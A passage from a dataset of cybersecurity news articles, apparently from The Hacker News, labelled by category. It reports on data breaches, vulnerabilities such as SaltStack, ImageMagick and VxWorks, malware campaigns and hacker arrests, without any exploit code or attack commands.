project. For a country with a population of over 16 million people, the breach exposed details of almost every Ecuadorian citizen, including President Lenín Moreno as well as WikiLeaks CEO Julian Assange, who was given political asylum in the country in 2012. The unsecured Elasticsearch server, which was based in Miami and owned by Ecuadorian company Novaestrat, contained 18GB cache of data appeared to have come from a variety of sources including government registries, an automotive association called Aeade, and an Ecuadorian national bank called Biess. Data Breach Exposes Personal Data of Almost Entire Ecuador Population The cache reportedly contained everything from full names, gender, dates and places of birth, phone numbers and addresses, to marital statuses, national identification numbers (similar to social security numbers), employment information, and details of education. The cache also contained specific financial information related information to accounts held with the Ecuadorian national bank Biess, including person's bank account statuses, current balances and credit type, along with detailed information about individuals' family members. vpnMentor notified the Ecuadorian Computer Incident Response Center (EcuCERT) of the breach, who then immediately informed Novaestrat, the online data consulting firm in the city of Esmeraldas who owned the unsecured server, which was later taken offline on September 11. Authorities Investigating Company Allegedly Responsible for the Leak As part of the investigation, Ecuadorian officials also said in a statement on Tuesday that they had arrested the manager of Novaestrat identified as William Roberto G and seized electronic equipment, computers, storage devices, and documentation during a raid at his home. Roberto has been taken to the Ecuadorian capital, Quito, by the authorities for questioning and may face criminal charges. Also, given the privacy concerns surrounding the incident, the country's Minister of Telecommunications said legal actions would be taken against the affected institutions to sanction private companies responsible for violating privacy and publicizing personal information without authorization. The Minister of Telecommunications also said it is planning to pass a new data privacy law in the country, which they have been working for the past eight months, to protect the personal data of its citizens. This is not the first time when the country has suffered a significant data security breach. In 2016, hackers managed to steal $12 million from an Ecuadorian bank, Banco del Austro (BDA), by breaching its Swift payment system. However, the latest Ecuador's breach recalled Bulgaria history's biggest data breach that took place on July 2019 and exposed personal and financial information of 5 million adult Bulgarian citizens out of its total population of 7 million people—that's over 70% of the country's population. ",Data_Breaches Critical SaltStack RCE Bug (CVSS Score 10) Affects Thousands of Data Centers,https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html,"Two severe security flaws have been discovered in the open-source SaltStack Salt configuration framework that could allow an adversary to execute arbitrary code on remote servers deployed in data centers and cloud environments. The vulnerabilities were identified by F-Secure researchers earlier this March and disclosed on Thursday, a day after SaltStack released a patch (version 3000.2) addressing the issues, rated with CVSS score 10. ""The vulnerabilities, allocated CVE IDs CVE-2020-11651 and CVE-2020-11652, are of two different classes,"" the cybersecurity firm said. ""One being authentication bypass where functionality was unintentionally exposed to unauthenticated network clients, the other being directory traversal where untrusted input (i.e., parameters in network requests) was not sanitized correctly allowing unconstrained access to the entire filesystem of the master server."" The researchers warned that the flaws could be exploited in the wild imminently. SaltStack is also urging users to follow the best practices to secure the Salt environment. Vulnerabilities in ZeroMQ Protocol Salt is a powerful Python-based automation and remote execution engine that's designed to allow users to issue commands to multiple machines directly. Built as a utility to monitor and update the state of servers, Salt employs a master-slave architecture that automates the process of pushing out configuration and software updates from a central repository using a ""master"" node that deploys the changes to a target group of ""minions"" (e.g., servers) en masse. The communication between a master and minion occurs over the ZeroMQ message bus. Additionally, the master uses two ZeroMQ channels, a ""request server"" to which minions report the execution results and a ""publish server,"" where the master publishes messages that the minions can connect and subscribe to. According to F-Secure researchers, the pair of flaws reside within the tool's ZeroMQ protocol. ""The vulnerabilities described in this advisory allow an attacker who can connect to the 'request server' port to bypass all authentication and authorization controls and publish arbitrary control messages, read and write files anywhere on the 'master' server filesystem and steal the secret key used to authenticate to the master as root,"" the researchers said. ""The impact is full remote command execution as root on both the master and all minions that connect to it."" In other words, an attacker can exploit the flaws to call administrative commands on the master server as well as queue messages directly on the master publish server, thereby allowing the salt minions to run malicious commands. What's more, a directory traversal vulnerability identified in the wheel module — which has functions to read and write files to specific locations — can permit reading of files outside of the intended directory due to a failure to properly sanitize file paths. Detecting Vulnerable Salt Masters F-Secure researchers said an initial scan revealed more than 6,000 vulnerable Salt instances exposed to the public internet. Detecting possible attacks against susceptible masters, therefore, entails auditing published messages to minions for any malicious content. ""Exploitation of the authentication vulnerabilities will result in the ASCII strings ""_prep_auth_info"" or ""_send_pub"" appearing in data sent to the request server port (default 4506),"" it added. It's highly recommended that Salt users update the software packages to the latest version. ""Adding network security controls that restrict access to the salt master (ports 4505 and 4506 being the defaults) to known minions, or at least block the wider Internet, would also be prudent as the authentication and authorization controls provided by Salt are not currently robust enough to be exposed to hostile networks,"" the researchers said. ",Vulnerability "vBulletin Forum hacked with Zero Day vulnerability, caused Macrumors Forum Data breach",https://thehackernews.com/2013/11/vBulletin-hacked-Zero-Day-vulnerability.html,"Last Tuesday, Popular Mac news website MacRumors's user forums was hacked and forum database has been compromised including the username, email and passwords belonging to all 860,000 registered users. Yesterday, Inj3ct0r Team of Exploit Database website 1337Day claimed the responsibility for the hack and also claimed that they have also hacked the official website of vBulletin Forum using a Zero Day exploit. ""Macrumors.com was based on vBulletin CMS. We use our 0day exploit vBulletin, got password moderator. 860000 user data hacked too. The network security is a myth"" he told me. During the conversation, team leader told me that he has discovered a Zero Day Remote Code Execution vulnerability in vBulletin v4.x.x and 5.х.x, that allows an attacker to execute arbitrary code on the server end remotely. On their exploit marketplace they are also selling this zero day exploit with Shell Upload payload at $7000 USD. ""We found a critical vulnerability in all vBulletin versions 4.x.x and 5.х.x. We have successfully uploaded our shell on the official vbulletin server and dumped their database after getting root access. All those wishing to buy this vulnerability and patch their forums can get the exploit from our site."" he added. For proof of concept, they have shared some screenshots of vBulletin database and server shell, as shown below: The official vBulletin team also admitted the breach and issued a warning note via e-mail and company forum post, urged customers to change their passwords as soon as possible. ""Very recently, our security team discovered sophisticated attacks on our network, involving the illegal access of forum user information, possibly including your password."" However, if somehow credentials are compromised of such forums or sites, many people use the same passwords for their other accounts, which provides the attacker with a much easier way to compromising the highest value targets. So always, please use different passwords for different websites. Update : World biggest Hacking Conference DEF CON forum also goes down because of the vBulletin zero day exploit in the wild. ""We have disabled the forums until there is resolution on a possible vulnerability. Once we have a fix/patch installed, we'll re-open service. Thanks! Sorry about the down-time."" ",Vulnerability Ransomware Virus Shuts Down Electric and Water Utility,https://thehackernews.com/2016/04/power-ransomware-attack.html,"Ransomware has become an albatross around the neck, targeting businesses, hospitals, and personal computers worldwide and extorting Millions of Dollars. Typical Ransomware targets victim's computer encrypts files on it, and then demands a ransom -- typically about $500 in Bitcoin -- in exchange for a key that will decrypt the files. Guess what could be the next target of ransomware malware? Everything that is connected to the Internet. There is a huge range of potential targets, from the pacemaker to cars to Internet of the Things, that may provide an opportunity for cybercriminals to launch ransomware attacks. Recently, the American public utility Lansing Board of Water & Light (BWL) has announced that the company has become a victim of Ransomware attack that knocked the utility's internal computer systems offline. Also Read: FBI Suggests Ransomware Victims — 'Just Pay the Ransom'. The attack took place earlier this week when one of the company's employees opened a malicious email attachment. Once clicked, the malware installed on the computer and quickly began encrypting the organization's files, according to the Lansing State Journal. BWL quickly decided to shut down its networks and suspend some services, including accounting and email service for its about 250 employees, in order to prevent further damages. Power and water shut-offs by BWL was also suspended. Though the ransomware type is still unknown, the utility is currently working with the Federal Bureau of Investigation (FBI) and local law enforcement authorities to investigate the incident. The company assured its 96,000 customers that no personal information related to its customers or employees has been compromised by the ransomware intrusion into the corporate computer network. However, it is not yet clear whether the utility paid the Ransom in exchange of its data. The company said law enforcement has limited it from discussing the issue in public, at least for now. ",Cyber_Attack "Paunch, the author of Blackhole Exploit kit arrested in Russia",https://thehackernews.com/2013/10/paunch-author-of-blackhole-exploit-kit.html,"According to a Security Analyst 'Maarten Boone' working at Fox-IT company, the Developer of notorious Blackhole Exploit Kit developer 'Paunch' and his partners were arrested in Russia recently. Blackhole Exploit Kit which is responsible for the majority of web attacks today, is a crimeware that makes it simple for just about anyone to build a botnet. This Malware kit was developed by a hacker who uses the nickname ""Paunch"" and his Team, has gained wide adoption and is currently one of the most common exploit frameworks used for Web-based malware delivery. The Blackhole exploit kit is a framework for delivering exploits via compromised or third-party websites, serve up a range of old and new exploits for Oracle's Java, Adobe's Flash and other popular software to take control of victim's machines. It the point of writing No Police Authority or Press has confirmed the claim made by Maarten about the arrest of Malware author. Please Stay tuned to THN for updates about the Story. In April, 2013 - Russian hackers and developers behind the Carberp botnet, that stole millions from bank accounts worldwide were also arrested. ",Malware 18-Year-Old Hacker Gets 3 Years in Prison for Massive Twitter 'Bitcoin Scam' Hack,https://thehackernews.com/2021/03/18-year-old-hacker-gets-3-years-in.html,"A Florida teen accused of masterminding the hacks of several high-profile Twitter accounts last summer as part of a widespread cryptocurrency scam pled guilty to fraud charges in exchange for a three-year prison sentence. Graham Ivan Clark, 18, will also serve an additional three years on probation. The development comes after the U.S. Department of Justice (DoJ) charged Mason Sheppard (aka Chaewon), Nima Fazeli (aka Rolex), and Clark (then a juvenile) with conspiracy to commit wire fraud and money laundering. Specifically, 30 felony charges were filed against Clark, including one count of organized fraud, 17 counts of communications fraud, one count of fraudulent use of personal information with over $100,000 or 30 or more victims, 10 counts of fraudulent use of personal information, and one count of access to computer or electronic device without authority. On July 15, 2020, Twitter suffered one of the biggest security lapses in its history after the attackers managed to hijack nearly 130 high-profile Twitter accounts pertaining to politicians, celebrities, and musicians, including that of Barack Obama, Kanye West, Joe Biden, Bill Gates, Elon Musk, Jeff Bezos, Warren Buffett, Uber, and Apple. The broadly targeted hack posted similarly worded messages urging millions of followers of each profile to send money to a specific bitcoin wallet address in return for larger payback. The scheme netted about $117,000 in bitcoin before it was shut down. Subsequent investigation into the incident revealed that Clark and the other attackers seized the accounts after stealing Twitter employees' credentials through a successful phone spear-phishing attack, subsequently using them to gain access to the company's internal network and account support tools, change user account settings, and take over control. ""By obtaining employee credentials, they were able to target specific employees who had access to our account support tools. They then targeted 130 Twitter accounts - Tweeting from 45, accessing the DM inbox of 36, and downloading the Twitter Data of 7,"" the company said on July 31. Additionally, the three individuals attempted to monetize this entrenched access by selling the hijacked accounts on OGUsers, a forum notorious for peddling access to social media and other online accounts. In light of the hacks, Twitter said it's making security improvements aimed at detecting and preventing inappropriate access to its internal systems, which were used by more than 1,000 employees and contractors as of early 2020. ""He took over the accounts of famous people, but the money he stole came from regular, hard-working people,"" Hillsborough State Attorney Andrew Warren said in a statement. ""Graham Clark needs to be held accountable for that crime, and other potential scammers out there need to see the consequences."" ""In this case, we've been able to deliver those consequences while recognizing that our goal with any child, whenever possible, is to have them learn their lesson without destroying their future."" ",Cyber_Attack Windows Error Crash Reports or Treasure of Zero-Day vulnerabilities for NSA?,https://thehackernews.com/2014/01/windows-error-crash-reports-or-treasure.html,"I am sure that you all have been familiar with the above shown annoying Window Operating System error messages that many times pop ups on your screen while working on the system in case of process failure i.e. ""The system has recovered from a serious error. A log of this error has been created. Please tell Microsoft about this problem"" The message that prompts ask the user to report the problem to Microsoft followed by the options to Send an error report or Not send. Most of the time Gentle users like you and me used to submit these error reports to aware the Microsoft about the problem. But What if these crash reports can be abused to identify the vulnerabilities of your system for Spying? NSA is intercepting wide range of Internet Traffic including many Encrypted connections and naturally unencrypted also and surprisingly, by default Microsoft encrypts its reports, but the messages are transmitted unencrypted or over standard HTTP connections to watson.microsoft.com. The latest revelations from the Snowden document leaks revealed by the German publication Der Spiegel described how the NSA's secret hacking unit called Tailored Access Operations Unit, or TAO Unit, breaking into a windows computer by gaining passive access to machines. Der Spiegel's explains: The automated crash reports are a ""neat way"" to gain ""passive access"" to a machine, the presentation continues. Passive access means that, initially, the only data the computer sends out into the Internet is captured and saved, but the computer itself is not yet manipulated. Still, even this passive access to error messages provides valuable insights into problems with a targeted person's computer and, thus, information on security holes that might be exploitable for planting malware or spyware on the unwitting victim's computer. Microsoft has Windows Error Reporting (a.k.a. Dr. Watson) technology from Windows XP to later versions. Windows crash reports give up all kinds of information about your system, allowing them to know what software is installed on your PC, respective versions and whether the programs or OS have been patched. Websense Security Firm observed the Windows Error Reporting system and find that it sends out its crash logs in the clear text: This information includes: Date USB Device Manufacturer USB Device Identifier USB Device Revision Host computer - default language Host computer - Operating system, service pack and update version Host computer - Manufacturer, model and name Host computer - Bios version and unique machine identifier Why should we care about this? Because System or application Crashes signal about various possible Zero-day vulnerabilities that could be exploited and this is the exact information that the NSA or anyone else needs when tailoring a specific attack against your system, or when designing some kind of malware to infect it. Der Spiegel also added: When TAO selects a computer somewhere in the world as a target and enters its unique identifiers (an IP address, for example) into the corresponding database, intelligence agents are then automatically notified any time the operating system of that computer crashes and its user receives the prompt to report the problem to Microsoft. An internal presentation suggests it is NSA's powerful XKeyscore spying tool that is used to fish these crash reports out of the massive sea of Internet traffic. A Microsoft spokesperson asked to comment on the reports said, ""Microsoft does not provide any government with direct or unfettered access to our customer's data. We would have significant concerns if the allegations about government actions are true."" Websense also recommends that Error report data should be encrypted with SSL at a minimum, ideally using TLS 1.2 in order to prevent it from NSA snooping. Alexander Watson, director of security research, Websense, will be presenting advanced findings related to this research at the 2014 RSA Conference in San Francisco. How To Disable Error Reporting: If you want to disable Windows Error Reporting, open Control Panel and search for ""Problem reporting settings"". Open that option and Select ""Never check for solutions."" However Microsoft does not recommend users do so, but it's your choice, neither it harms your system. ",Vulnerability Warning — Widely Popular ImageMagick Tool Vulnerable to Remote Code Execution,https://thehackernews.com/2016/05/imagemagick-exploit-hack.html,"A serious zero-day vulnerability has been discovered in ImageMagick, a widely popular software tool used by a large number of websites to process user's photos, which could allow hackers to execute malicious code remotely on servers. ImageMagick is an open-source image processing library that lets users resize, scale, crop, watermarking and tweak images. The ImageMagick tool is supported by many programming languages, including Perl, C++, PHP, Python, Ruby and is being deployed by Millions of websites, blogs, social media platforms, and popular content management systems (CMS) such as WordPress and Drupal. Slack security engineer Ryan Huber disclosed a zero-day flaw (CVE-2016–3714) in the ImageMagick image processing library that allows a hacker to execute malicious code on a Web server by uploading maliciously-crafted image. For example, by uploading a booby-trapped selfie to a web service that uses ImageMagick, an attacker can execute malicious code on the website's server and steal critical information, snoop on user's accounts and much more. In other words, only those websites are vulnerable that make use of ImageMagick and allow their users to upload images. The exploit for the vulnerability has been released and named: ImageTragick. ""The exploit for this vulnerability is being used in the wild,"" Huber wrote in a blog post published Tuesday. ""The exploit is trivial, so we expect it to be available within hours of this post."" He added ""We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software."" The ImageMagick team has also acknowledged the flaw, saying the recent ""vulnerability reports … include possible Remote Code Execution and ability to render files on the local system."" Though the team has not rolled out any security patches, it recommended that website administrators should add several lines of code to configuration files in order to block attacks, at least via the possible exploits. Web administrators are also recommended to check the 'magic bytes' in files sent to ImageMagick before allowing the image files to be processed on their end. Magic bytes are the first few bytes of a file used to identify the image type, such as GIF, JPEG, PNG. The vulnerability will be patched in versions 7.0.1-1 and 6.9.3-10 of ImageMagick, which are due to be released by the weekend. ",Vulnerability XSS Vulnerability on Real Player Website by THEc7cREW,https://thehackernews.com/2011/05/xss-vulnerability-on-real-player.html,"XSS Vulnerability on Real Player Website by THEc7cREW THEc7cREW Found XSS Vulnerability on Real Player Website , Click Here to See the POC. ",Vulnerability Chrome Bug Allowed Hackers to Find Out Everything Facebook Knows About You,https://thehackernews.com/2018/08/google-chrome-vulnerability.html,"With the release of Chrome 68, Google prominently marks all non-HTTPS websites as 'Not Secure' on its browser to make the web a more secure place for Internet users. If you haven't yet, there is another significant reason to immediately switch to the latest version of the Chrome web browser. Ron Masas, a security researcher from Imperva, has discovered a vulnerability in web browsers that could allow attackers to find everything other web platforms, like Facebook and Google, knows about you—and all they need is just trick you into visiting a website. The vulnerability, identified as CVE-2018-6177, takes advantage of a weakness in audio/video HTML tags and affects all web browsers powered by ""Blink Engine,"" including Google Chrome. To illustrate the attack scenario, the researcher took an example of Facebook, a popular social media platform that collects in-depth profiling information on its users, including their age, gender, where you have been (location data) and interests, i.e., what you like and what you don't. You must be aware of Facebook offering post targeting feature to page administrators, allowing them to define a targeted or restricted audience for specific posts based on their age, location, gender, and interest. How the Browser Attack Works? To demonstrate the vulnerability, the researcher created multiple Facebook posts with different combinations of the restricted audiences to categorize victims according to their age, location, interest or gender. Now, if a website embeds all these Facebook posts on a web page, it will load and display only a few specific posts at the visitors' end based on individuals' profile data on Facebook that matches restricted audience settings. For example, if a post—defined to be visible only to the Facebook users with age 26, male, having interest in hacking or Information Security—was loaded successfully, an attacker can potentially learn personal information on visitors, regardless of their privacy settings. Though the idea sounds exciting and quite simple, there are no direct ways available for site administrators to determine whether an embedded post was loaded successfully for a specific visitor or not. Thanks to Cross-Origin Resource Sharing (CORS)—a browser security mechanism that prevents a website from reading the content of other sites without their explicit permission. However, Imperva researcher found that since audio and video HTML tags don't validate the content type of fetched resources or reject responses with invalid MIME types, an attacker can use multiple hidden video or audio tags on a website to request Facebook posts. Though this method doesn't display Facebook posts as intended, it does allow the attacker-controlled website to measure (using JavaScript) the size of cross-origin resources and number of requests to find out which specific posts were successfully fetched from Facebook for an individual visitor. ""With several scripts running at once — each testing a different and unique restriction — the bad actor can relatively quickly mine a good amount of private data about the user,"" Masses said. ""I found that by engineering sites to return a different response size depending on the currently logged user properties it is possible to use this method to extract valuable information."" A member from Google security team also pointed that the vulnerability could also work against websites using APIs to fetch user session specific information. The core of this vulnerability has some similarities with another browser bug, patched in June this year, which exploited a weakness in how web browsers handle cross-origin requests to video and audio files, allowing attackers to read the content of your Gmail or private Facebook messages. Imperva researcher reported the vulnerability to Google with a proof of concept exploit, and the Chrome team patched the issue in Chrome 68 release. So, Chrome users are strongly recommended to update their browser to the latest version, if they haven't yet. ",Vulnerability Google Uncovers How Just Visiting Some Sites Were Secretly Hacking iPhones For Years,https://thehackernews.com/2019/08/hacking-iphone-ios-exploits.html,"Beware Apple users! Your iPhone can be hacked just by visiting an innocent-looking website, confirms a terrifying report Google researchers released earlier today. The story goes back to a widespread iPhone hacking campaign that cybersecurity researchers from Google's Project Zero discovered earlier this year in the wild, involving at least five unique iPhone exploit chains capable of remotely jailbreaking an iPhone and implanting spyware on it. Those iOS exploit chains were found exploiting a total of 14 separate vulnerabilities in Apple's iOS mobile operating system—of which 7 flaws resided in Safari web browser, 5 in the iOS kernel and 2 separate sandbox escape issues—targeting devices with almost every version in that time-frame from iOS 10 through to the latest version of iOS 12. According to a deep-dive blog post published by Project Zero researcher Ian Beer, only two of the 14 security vulnerabilities were zero-days, CVE-2019-7287 and CVE-2019-7286, and unpatched at the time of discovery—and surprisingly, the campaign remained undetected for at least two years. Though the technical details and background story of both then-zero-day vulnerabilities were not available at that time, The Hacker News warned about both the flaws in February after Apple released iOS version 12.1.4 to address them. ""We reported these issues to Apple with a 7-day deadline on 1 Feb 2019, which resulted in the out-of-band release of iOS 12.1.4 on 7 Feb 2019. We also shared the complete details with Apple, which were disclosed publicly on 7 Feb 2019,"" Beer says. Now, as Google researcher explained, the attack was being carried out through a small collection of hacked websites with thousands of visitors per week, targeting every iOS user landing on those websites without discrimination. ""Simply visiting the hacked site was enough for the exploit server to attack your device, and if it was successful, install a monitoring implant,"" Beer says. Once an iPhone user visited one of the hacked websites through the vulnerable Safari web browser, it triggered WebKit exploits for each exploit chain in an attempt to gain an initial foothold onto the user's iOS device and stage the privilege escalation exploits to further gain root access to the device, which is the highest level of access. The iPhone exploits were used to deploy an implant primarily designed to steal files like iMessages, photos, and live GPS location data of users, and upload them to an external server every 60 seconds. ""There is no visual indicator on the device that the implant is running. There's no way for a user on iOS to view a process listing, so the implant binary makes no attempt to hide its execution from the system,"" Beers explains. The spyware implant also stole the database files from the victim's device used by popular end-to-end encryption apps like Whatsapp, Telegram, and iMessage to store data, including private chats in the plaintext. In addition, the implant also had access to users' device's keychain data containing credentials, authentication tokens, and certificates used on and by the device. ""The keychain also contains the long-lived tokens used by services such as Google's iOS Single-Sign-On to enable Google apps to access the user's account. These will be uploaded to the attackers and can then be used to maintain access to the user's Google account, even once the implant is no longer running,"" Beers says. While the implant would be automatically wiped off from an infected iPhone upon rebooting thereby leaving no trace of itself, visiting the hacked site again would reinstall the implant. Alternatively, as Beer explains, the attackers may ""nevertheless be able to maintain persistent access to various accounts and services by using the stolen authentication tokens from the keychain, even after they lose access to the device."" Takeaway: Since Apple already patched the majority of vulnerabilities exploited by the uncovered iPhone exploits, users are always recommended to keep their devices up-to-date to avoid becoming victims of such attack chains. Update: Apple Accuses Google of Spreading Misinformation Apple released a bold statement regarding the ""indiscriminate"" iPhone hacking campaign that Google's Project Zero researchers disclosed earlier this week, accusing Google of creating the false impression of ""mass exploitation."" Apple confirmed that the attack, but said it affected fewer than a dozen websites that focus on content related to the Uighur community, and also clarifies the watering hole sites attacks were only operational for a brief period, roughly two months, not ""two years"" as Google implies. In response to Apple's latest statement, Google spokesperson also released and shared a statement with The Hacker News, saying: ""Project Zero posts technical research that is designed to advance the understanding of security vulnerabilities, which leads to better defensive strategies. We stand by our in-depth research which was written to focus on the technical aspects of these vulnerabilities. We will continue to work with Apple and other leading companies to help keep people safe online."" ",Vulnerability Critical Flaws Found in VxWorks RTOS That Powers Over 2 Billion Devices,https://thehackernews.com/2019/07/vxworks-rtos-vulnerability.html,"Security researchers have discovered almost a dozen zero-day vulnerabilities in VxWorks, one of the most widely used real-time operating systems (RTOS) for embedded devices that powers over 2 billion devices across aerospace, defense, industrial, medical, automotive, consumer electronics, networking, and other critical industries. According to a new report Armis researchers shared with The Hacker News prior to its release, the vulnerabilities are collectively dubbed as URGENT/11 as they are 11 in total, 6 of which are critical in severity leading to 'devastating' cyberattacks. Armis Labs is the same IoT security company that previously discovered the BlueBorne vulnerabilities in Bluetooth protocol that impacted more than 5.3 Billion devices—from Android, iOS, Windows and Linux to the Internet of things (IoT). These vulnerabilities could allow remote attackers to bypass traditional security solutions and take full control over affected devices or ""cause disruption on a scale similar to what resulted from the EternalBlue vulnerability,"" without requiring any user interaction, researchers told The Hacker News. It's likely possible that many of you might have never heard of this operating system, but Wind River VxWorks is being used to run many everyday internet-of-things such as your webcam, network switches, routers, firewalls, VOIP phones, printers, and video-conferencing products, as well as traffic lights. Besides this, VxWorks is also being used by mission-critical systems including SCADA, trains, elevators and industrial controllers, patient monitors, MRI machines, satellite modems, in-flight WiFi systems, and even the mars rovers. URGENT/11 ⁠— Vulnerabilities in VxWorks RTOS The reported URGENT/11 vulnerabilities reside in the IPnet TCP/IP networking stack of the RTOS that was included in VxWorks since its version 6.5, apparently leaving all versions of VxWorks released in the last 13 years vulnerable to device takeover attacks. All 6 critical vulnerabilities let attackers trigger remote code execution (RCE) attacks, and remaining flaws could lead to denial-of-service, information leaks, or logical flaws. Critical Remote Code Execution Flaws: Stack overflow in the parsing of IPv4 options (CVE-2019-12256) Four memory corruption vulnerabilities stemming from erroneous handling of TCP's Urgent Pointer field (CVE-2019-12255, CVE-2019-12260, CVE-2019-12261, CVE-2019-12263) Heap overflow in DHCP Offer/ACK parsing in ipdhcpc (CVE-2019-12257) DoS, Information Leak, and Logical Flaws: TCP connection DoS via malformed TCP options (CVE-2019-12258) Handling of unsolicited Reverse ARP replies (Logical Flaw) (CVE-2019-12262) Logical flaw in IPv4 assignment by the ipdhcpc DHCP client (CVE-2019-12264) DoS via NULL dereference in IGMP parsing (CVE-2019-12259) IGMP Information leak via IGMPv3 specific membership report (CVE-2019-12265) All these flaws can be exploited by an unauthenticated, remote attacker just by sending a specially crafted TCP packet to an affected device without requiring any user interaction or prior information regarding the targeted device. However, each version of VxWorks since 6.5 is not vulnerable to all 11 flaws, but at least one critical RCE flaw affects each version of the real-time operating system. ""VxWorks includes some optional mitigations that could make some of the URGENT/11 vulnerabilities harder to exploit, but these mitigations are rarely used by device manufacturers,"" the researchers say. Armis researchers believe URGENT/11 flaws might affect devices using other real-time operating systems as well, as IPnet was used in other operating systems prior to its acquisition by VxWorks in 2006. How Can Remote Attackers Exploit VxWorks Flaws? The exploitation of VxWorks IPnet vulnerabilities also depends upon the location of an attacker and the targeted vulnerable device; after all, the attacker's network packets should reach the vulnerable system. According to the researchers, the threat surface of URGENT/11 flaws can be divided into 3 attack scenarios, as explained below: Scenario 1: Attacking the Network's Defenses Since VxWorks also powers networking and security devices such as switches, routers, and firewalls that are usually reachable over the public Internet, a remote attacker can launch a direct attack against such devices, taking complete control over them, and subsequently, over the networks behind them. For example, there are over 775,000 SonicWall firewalls connected to the Internet at the time of writing that runs VxWorks RTOS, according to Shodan search engine. Scenario 2: Attacking from Outside the Network Bypassing Security Besides targeting Internet-connected devices, an attacker can also attempt to target IoT devices that are not directly connected to the Internet but communicates with its cloud-based application protected behind a firewall or NAT solution. According to the researchers, a potential attacker can use DNS changing malware or man-in-the-middle attacks to intercept a targeted device' TCP connection to the cloud and launch a remote code execution attack on it. Scenario 3: Attacking from within the Network In this scenario, an attacker who already has positioned himself within the network as a result of a prior attack can launch attacks against affected VxWorks powered devices simultaneously even when they have no direct connection to the Internet. ""The vulnerabilities in these unmanaged and IoT devices can be leveraged to manipulate data, disrupt physical world equipment, and put people's lives at risk,"" said Yevgeny Dibrov, CEO and co-founder of Armis. ""A compromised industrial controller could shut down a factory, and a pwned patient monitor could have a life-threatening effect."" ""To the best of both companies knowledge, there is no indication the URGENT/11 vulnerabilities have been exploited."" However, researchers also confirmed that these vulnerabilities do not impact other variants of VxWorks designed for certification, such as VxWorks 653 and VxWorks Cert Edition. Armis reported these vulnerabilities to Wind River Systems responsibly, and the company has already notified several device manufacturers and released patches to address the vulnerabilities last month. Meanwhile, affected product vendors are also in the process of releasing patches for their customers, which researchers believe will take time and be difficult, as is usually the case when it comes to IoT and critical infrastructure updates. SonicWall and Xerox have already released patches for its firewall devices and printers, respectively. ",Vulnerability Microsoft Says SolarWinds Hackers Accessed Some of Its Source Code,https://thehackernews.com/2020/12/microsoft-says-solarwinds-hackers.html,"Microsoft on Thursday revealed that the threat actors behind the SolarWinds supply chain attack were able to gain access to a small number of internal accounts and escalate access inside its internal network. The ""very sophisticated nation-state actor"" used the unauthorized access to view, but not modify, the source code present in its repositories, the company said. ""We detected unusual activity with a small number of internal accounts and upon review, we discovered one account had been used to view source code in a number of source code repositories,"" the Windows maker disclosed in an update. ""The account did not have permissions to modify any code or engineering systems and our investigation further confirmed no changes were made. These accounts were investigated and remediated."" The development is the latest in the far-reaching espionage saga that came to light earlier in December following revelations by cybersecurity firm FireEye that attackers had compromised its systems via a trojanized SolarWinds update to steal its Red Team penetration testing tools. During the course of the probe into the hack, Microsoft had previously admitted to detecting malicious SolarWinds binaries in its own environment but denied its systems were used to target others or that attackers had access to production services or customer data. Several other companies, including Cisco, VMware, Intel, NVIDIA, and a number of other US government agencies, have since discovered markers of the Sunburst (or Solorigate) malware on their networks, planted via tainted Orion updates. The Redmond-based company said its investigation is still ongoing but downplayed the incident, adding ""viewing source code isn't tied to elevation of risk"" and that it had found evidence of attempted activities that were neutralized by its protections. In a separate analysis published by Microsoft on December 28, the company called the attack a ""cross-domain compromise"" that allowed the adversary to introduce malicious code into signed SolarWinds Orion Platform binaries and leverage this widespread foothold to continue operating undetected and access the target's cloud resources, culminating in the exfiltration of sensitive data. SolarWinds' Orion software, however, wasn't the only initial infection vector, as the US Cybersecurity and Infrastructure Security Agency (CISA) said the attackers used other methods as well, which have not yet been publicly disclosed. The agency also released supplemental guidance urging all US federal agencies that still run SolarWinds Orion software to update to the latest 2020.2.1 HF2 version. ""The National Security Agency (NSA) has examined this version and verified that it eliminates the previously identified malicious code,"" the agency said. ",Malware "Trojanized BitTorrent Software Update Hijacked 400,000 PCs Last Week",https://thehackernews.com/2018/03/windows-malware-hacking.html,"A massive malware outbreak that last week infected nearly half a million computers with cryptocurrency mining malware in just a few hours was caused by a backdoored version of popular BitTorrent client called MediaGet. Dubbed Dofoil (also known as Smoke Loader), the malware was found dropping a cryptocurrency miner program as payload on infected Windows computers that mine Electroneum digital coins for attackers using victims' CPU cycles. Dofoil campaign that hit PCs in Russia, Turkey, and Ukraine on 6th March was discovered by Microsoft Windows Defender research department and blocked the attack before it could have done any severe damages. At the time when Windows Defender researchers detected this attack, they did not mention how the malware was delivered to such a massive audience in just 12 hours. However, after investigation Microsoft today revealed that the attackers targeted the update mechanism of MediaGet BitTorrent software to push its trojanized version (mediaget.exe) to users' computers. ""A signed mediaget.exe downloads an update.exe program and runs it on the machine to install a new mediaget.exe. The new mediaget.exe program has the same functionality as the original but with additional backdoor capability,"" the researchers explain in a blog post published today. Researchers believe MediaGet that signed update.exe is likely to be a victim of the supply chain attack, similar to CCleaner hack that infected over 2.3 million users with the backdoored version of the software in September 2017. Also, in this case, the attackers signed the poisoned update.exe with a different certificate and successfully passed the validation required by the legitimate MediaGet. ""The dropped update.exe is a packaged InnoSetup SFX which has an embedded trojanized mediaget.exe, update.exe. When run, it drops a trojanized unsigned version of mediaget.exe."" Once updated, the malicious BitTorrent software with additional backdoor functionality randomly connects to one (out of four) of its command-and-control (C&C) servers hosted on decentralized Namecoin network infrastructure and listens for new commands. It then immediately downloads CoinMiner component from its C&C server, and start using victims' computers mine cryptocurrencies for the attackers. Using C&C servers, attackers can also command infected systems to download and install additional malware from a remote URL. The researchers found that the trojanized BitTorrent client, detected by Windows Defender AV as Trojan:Win32/Modimer.A, has 98% similarity to the original MediaGet binary. Microsoft says behavior monitoring and AI-based machine learning techniques used by its Windows Defender Antivirus software have played an important role to detect and block this massive malware campaign. ",Malware Malicious Olympic 2012 Android Apps & Domains,https://thehackernews.com/2012/08/malicious-olympic-2012-android-apps.html,"Whenever an important event takes place, new opportunities for cyber criminals, especially for those who develop attacks based on social engineering, arise. Currently, the whole world has its eyes glued to TV screens watching the London 2012 Olympic Games. Anti-malware and anti-virus solutions provider Webroot has issued a warning that an app app called ""London Olympics Widget,"" which is described as an app that displays aggregated Olympic news coverage. In fact, it's really just harvesting the user's contact list and device ID while reading up on SMS messages too. The package name is 'com.games.London.Olympics.widget'. This app has a digital certificate claiming it was developed in New Delhi, India. For this scam, cybercriminals create websites that 